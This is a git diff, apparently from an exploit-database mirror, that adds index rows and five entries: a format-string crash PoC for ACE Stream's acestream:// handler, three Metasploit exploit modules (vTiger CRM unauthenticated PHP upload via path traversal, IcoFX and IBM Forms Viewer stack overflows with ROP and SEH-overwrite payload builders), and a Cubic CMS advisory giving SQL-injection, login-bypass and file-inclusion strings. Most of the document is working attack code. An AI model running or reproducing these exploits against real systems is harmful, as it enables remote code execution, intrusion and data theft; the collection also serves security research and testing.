diff --git a/files.csv b/files.csv
index a773fb338..2639f8f01 100755
--- a/files.csv
+++ b/files.csv
@@ -27516,6 +27516,7 @@ id,file,description,date,author,platform,type,port
30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.PHP Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0
30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0
30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0
+30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0
30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
@@ -27616,3 +27617,7 @@ id,file,description,date,author,platform,type,port
30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
+30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80
+30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
+30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
+30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80
diff --git a/platforms/multiple/local/30666.txt b/platforms/multiple/local/30666.txt
new file mode 100755
index 000000000..080b2e0bf
--- /dev/null
+++ b/platforms/multiple/local/30666.txt
@@ -0,0 +1,67 @@
+?
+ACE Stream Media 2.1 (acestream://) Format String Exploit PoC
+
+
+Vendor: ACE Stream
+Product web page: http://www.acestream.org
+Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)
+
+Summary: Ace Stream is an innovative multimedia platform of a new
+generation, which includes different products and solutions for
+ordinary Internet users as well as for professional members of the
+multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
+technology, BitTorrent protocol, which is acknowledged as the most
+effective protocol to transfer/deliver 'heavy content'.
+
+Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
+string vulnerability because the application fails to properly
+sanitize user-supplied input thru the URI using the 'acestream://'
+protocol before including it in the format-specifier argument of
+a formatted-printing function. A remote attacker may exploit this
+issue to execute arbitrary code with the privileges of the user
+running the affected application and/or cause memory address disclosure.
+Failed exploit attempts may cause denial-of-service (DoS) conditions.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5165
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
+
+
+30.12.2013
+
+--
+
+
+format md:
+
+acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
+acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
+acestream://AAAA%s
+acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
+acestream://AAAA%08d
+acestream://%i%i%i%i
+acestream://%c%c%c%c
+acestream://%f%f%f%f
+acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
+acestream://%15.10s.%15.10s
+acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
+acestream://%0a%0d
+acestream://%AA
+acestream://%p%p%p%p%s
+
+crashes:
+
+acestream://AAAA%08s
+acestream://AAAA%n
+acestream://%08s
+acestream://%p%p%p%p%s%n
+acestream://%n
+acestream://%s%s%s%s
+acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA
diff --git a/platforms/php/remote/30787.rb b/platforms/php/remote/30787.rb
new file mode 100755
index 000000000..36db8d113
--- /dev/null
+++ b/platforms/php/remote/30787.rb
@@ -0,0 +1,182 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include REXML
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
+ 'Description' => %q{
+ vTiger CRM allows an user to bypass authentication when requesting SOAP services.
+ In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
+ service. By combining both vulnerabilities an attacker can upload and execute PHP
+ code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
+ 10.04 and Windows 2003 SP2.
+ },
+ 'Author' =>
+ [
+ 'Egidio Romano', # Vulnerability discovery
+ 'juan vazquez' # msf module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2013-3214' ],
+ [ 'CVE', '2013-3215' ],
+ [ 'OSVDB', '95902' ],
+ [ 'OSVDB', '95903' ],
+ [ 'BID', '61558' ],
+ [ 'BID', '61559' ],
+ [ 'EDB', '27279' ],
+ [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
+ [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Payload' =>
+ {
+ # Arbitrary big number. The payload is sent base64 encoded
+ # into a POST SOAP request
+ 'Space' => 262144, # 256k
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'vTigerCRM v5.4.0', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Mar 26 2013'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
+ ], self.class)
+ end
+
+ def check
+ test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
+ res = send_soap_request(test_one)
+
+ unless res and res.code == 200 and res.body.to_s =~ //
+ return Exploit::CheckCode::Unknown
+ end
+
+ test_two = check_email_soap("admin")
+ res = send_soap_request(test_two)
+
+ if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /.*<\/return>/)
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ file_name = rand_text_alpha(rand(10)+6) + '.php'
+ php = %Q||
+
+ soap = add_attachment_soap(file_name, php)
+ res = send_soap_request(soap)
+
+ print_status("#{peer} - Uploading payload...")
+ if res and res.code == 200 and res.body.to_s =~ /.*<\/return>/
+ print_good("#{peer} - Upload successfully uploaded")
+ register_files_for_cleanup(file_name)
+ else
+ fail_with(Failure::Unknown, "#{peer} - Upload failed")
+ end
+
+ print_status("#{peer} - Executing payload...")
+ send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
+ end
+
+ def add_attachment_soap(file_name, file_data)
+ xml = Document.new
+ xml.add_element(
+ "soapenv:Envelope",
+ {
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+ 'xmlns:crm' => "http://www.vtiger.com/products/crm"
+ })
+ xml.root.add_element("soapenv:Header")
+ xml.root.add_element("soapenv:Body")
+ body = xml.root.elements[2]
+ body.add_element(
+ "crm:AddEmailAttachment",
+ {
+ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+ })
+ crm = body.elements[1]
+ crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filename", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
+ crm.add_element("username", {'xsi:type' => 'xsd:string'})
+ crm.add_element("session", {'xsi:type' => 'xsd:string'})
+ crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
+ crm.elements['filedata'].text = "MSF_PAYLOAD"
+ crm.elements['filename'].text = "MSF_FILENAME"
+ crm.elements['filesize'].text = file_data.length.to_s
+ crm.elements['filetype'].text = "php"
+ crm.elements['username'].text = rand_text_alpha(4+rand(4))
+
+ xml_string = xml.to_s
+ xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
+ xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
+
+ return xml_string
+ end
+
+ def check_email_soap(user_name = "", session = "")
+ xml = Document.new
+ xml.add_element(
+ "soapenv:Envelope",
+ {
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+ 'xmlns:crm' => "http://www.vtiger.com/products/crm"
+ })
+ xml.root.add_element("soapenv:Header")
+ xml.root.add_element("soapenv:Body")
+ body = xml.root.elements[2]
+ body.add_element(
+ "crm:CheckEmailPermission",
+ {
+ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+ })
+ crm = body.elements[1]
+ crm.add_element("username", {'xsi:type' => 'xsd:string'})
+ crm.add_element("session", {'xsi:type' => 'xsd:string'})
+ crm.elements['username'].text = user_name
+ crm.elements['session'].text = session
+
+ xml.to_s
+ end
+
+ def send_soap_request(soap_data)
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap_data
+ })
+
+ return res
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/30790.txt b/platforms/php/webapps/30790.txt
new file mode 100755
index 000000000..a3a5e701b
--- /dev/null
+++ b/platforms/php/webapps/30790.txt
@@ -0,0 +1,61 @@
+I. BACKGROUND
+-------------------------
+"CUBIC CMS" is a non-free content management system for websites and
+portals of any size, powerful, adaptable to any graphic design that
+allows users administration 100% professional but simple at the same
+time that website.
+
+II. VULNERABILITIES
+-------------------------
+
+II.i FULL PATH DISCLOSURE
+-------------------------
+CUBIC CMS presents a full path disclosure in the 'Controller Not Found'
+exception management, due to an incorrect 'Software Exception' management.
+
+Syntax:
+ http://www.example.com/id/-22
+ http://www.example.com/foo.bar
+
+II.ii SQL Injection
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters
+on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP
+Method, due to an insufficient sanitization on user supplied data.
+
+Syntax:
+ http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
+ http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
+
+II.iii SQL Injection
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his
+'/login.usuario' (Users Management Module) script via POST HTTP Method, due to an
+insufficient sanitization on user supplied data.
+
+Syntax:
+ login=Administrator&pass=foobar') or ('1'='1
+
+II.iv Local File Inclusion
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'path' parameter on his
+'/recursos/agent.php' (Resources Management Module) script via GET HTTP Method,
+due to an insufficient sanitization on user supplied data.
+
+Syntax:
+ http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini
+
+IV. REFERENCES
+-------------------------
+http://www.proyectosbds.com
+http://www.cubicfactory.com/
+
+V. DISCLOSURE TIMELINE
+-------------------------
+- March 28, 2012: First Vendor Contact.
+- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).
+
+VI. CREDITS
+-------------------------
+This vulnerability has been discovered
+by Eugenio Delfa .
\ No newline at end of file
diff --git a/platforms/windows/local/30788.rb b/platforms/windows/local/30788.rb
new file mode 100755
index 000000000..a11aed383
--- /dev/null
+++ b/platforms/windows/local/30788.rb
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IcoFX Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in version 2.1
+ of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
+ crafted ICONDIR header, providing an arbitrary long number of images into the file,
+ can be used to trigger the overflow when reading the ICONDIRENTRY structures.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Marcos Accossatto', # Vulnerability discovery, poc
+ 'juan vazquez' # Metasploit
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-4988' ],
+ [ 'OSVDB', '100826' ],
+ [ 'BID', '64221' ],
+ [ 'EDB', '30208'],
+ [ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ]
+ ],
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 864,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'IcoFX 2.5 / Windows 7 SP1',
+ {
+ :callback => :target_win7,
+ }
+ ],
+ ],
+ 'DisclosureDate' => 'Dec 10 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico'])
+ ], self.class)
+
+ end
+
+ def target_win7
+ # All the gadgets com from IcoFX2.exe 2.5.0.0
+
+ # ICONDIR structure
+ ico = [0].pack("v") # Reserved. Must always be 0
+ ico << [1].pack("v") # Image type: 1 for icon (.ico) image
+ # 0x66 is enough to overwrite the local variables and, finally
+ # the seh handler. 0x7f00 is used to trigger an exception after
+ # the overflow, while the overwritten SEH handler is in use.
+ ico << [0x7f00].pack("v")
+ # ICONDIRENTRY structures 102 structures are using to overwrite
+ # every structure = 16 bytes
+ # 100 structures are used to reach the local variables
+ ico << rand_text(652)
+ ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
+ ico << [0x0045cc21].pack("V") # jmp esp
+ ico << payload.encoded
+ ico << rand_text(
+ 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
+ 652 - # padding to align the stack pivot
+ 80 - # rop nops size
+ 4 - # jmp esp pointer size
+ payload.encoded.length
+ )
+ # The next ICONDIRENTRY allows to overwrite the interesting local variables
+ # on the stack
+ ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
+ ico << rand_text(8) # Padding
+ ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
+ # The next ICONDIRENTRY allows to overwrite the seh handler
+ ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
+ ico << rand_text(0xc) # padding
+ return ico
+ end
+
+ def exploit
+ unless self.respond_to?(target[:callback])
+ fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined")
+ end
+
+ ico = self.send(target[:callback])
+
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+ file_create(ico)
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/local/30789.rb b/platforms/windows/local/30789.rb
new file mode 100755
index 000000000..c8774c5f7
--- /dev/null
+++ b/platforms/windows/local/30789.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include REXML
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IBM Forms Viewer Unicode Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
+ is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
+ XFDL files, with a long fontname value. This module has been tested successfully on IBM
+ Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability discovery
+ 'juan vazquez', # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-5447' ],
+ [ 'OSVDB', '100732' ],
+ [ 'ZDI', '13-274' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 3000,
+ 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ECX',
+ 'BufferOffset' => 10
+ },
+ 'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
+ 'DisableNops' => true,
+ # Fix the stack before the payload is executed, so we avoid
+ # windows exceptions due to alignment
+ 'Prepend' =>
+ "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+ "\x83\xC0\x08" + # add eax, byte 8
+ "\x8b\x20" + # mov esp, [eax]
+ "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
+ # masqform.exe 8.0.0.266
+ {
+ 'Ret' => 0x4c30, # p/p/r unicode from masqform.exe
+ 'Nop' => 0x47, # 004700 => add [edi+0x0],al
+ 'Offset' => 62
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Dec 05 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']),
+ ], self.class)
+ end
+
+ def generate_xfdl
+ xml = Document.new
+
+ # XFDL
+ xfdl = xml.add_element("XFDL", {
+ 'xmlns:custom' => "http://www.ibm.com/xmlns/prod/XFDL/Custom",
+ 'xmlns:designer' => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6",
+ 'xmlns:ev' => "http://www.w3.org/2001/xml-events",
+ 'xmlns:xfdl' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+ 'xmlns:xforms' => "http://www.w3.org/2002/xforms",
+ 'xmlns' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance"
+ })
+
+ # XFDL => globalpage
+ xdfl_global_page = xfdl.add_element("globalpage", {
+ "sid" => "global"
+ })
+ global = xdfl_global_page.add_element("global", {
+ "sid" => "global"
+ })
+ designer_date = global.add_element("designer:date")
+ designer_date.text = "20060615"
+ form_id = global.add_element("formid")
+ form_id.add_element("title")
+ serial_number = form_id.add_element("serialnumber")
+ serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000"
+ version_form = form_id.add_element("version")
+ version_form.text = "1"
+
+ # XFDL => page
+ page = xfdl.add_element("page", {
+ "sid" => "PAGE1"
+ })
+
+ # XFDL => page => global
+ page_global = page.add_element("global", {
+ "sid" => "global"
+ })
+ label_page = page_global.add_element("label")
+ label_page.text = "PAGE1"
+
+ # XFDL => page => label
+ label = page.add_element("label", {
+ "sid" => "title"
+ })
+ item_location = label.add_element("itemlocation")
+ x = item_location.add_element("x")
+ x.text = "20"
+ y = item_location.add_element("y")
+ y.text = "0"
+ value = label.add_element("value", {
+ "compute" => "global.global.custom:formTitle"
+ })
+ value.text = rand_text_alpha(10)
+ font_info = label.add_element("fontinfo")
+ font_name = font_info.add_element("fontname")
+ font_name.text = "MSF_REPLACE"
+ xml.to_s
+ end
+
+
+ def exploit
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
+ sploit << [target.ret].pack("v") # seh # ppr
+ sploit << [target['Nop']].pack("C")
+ sploit << payload.encoded
+ sploit << rand_text_alpha(4096) # make it crash
+
+ xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(xfdl)
+ end
+
+end
\ No newline at end of file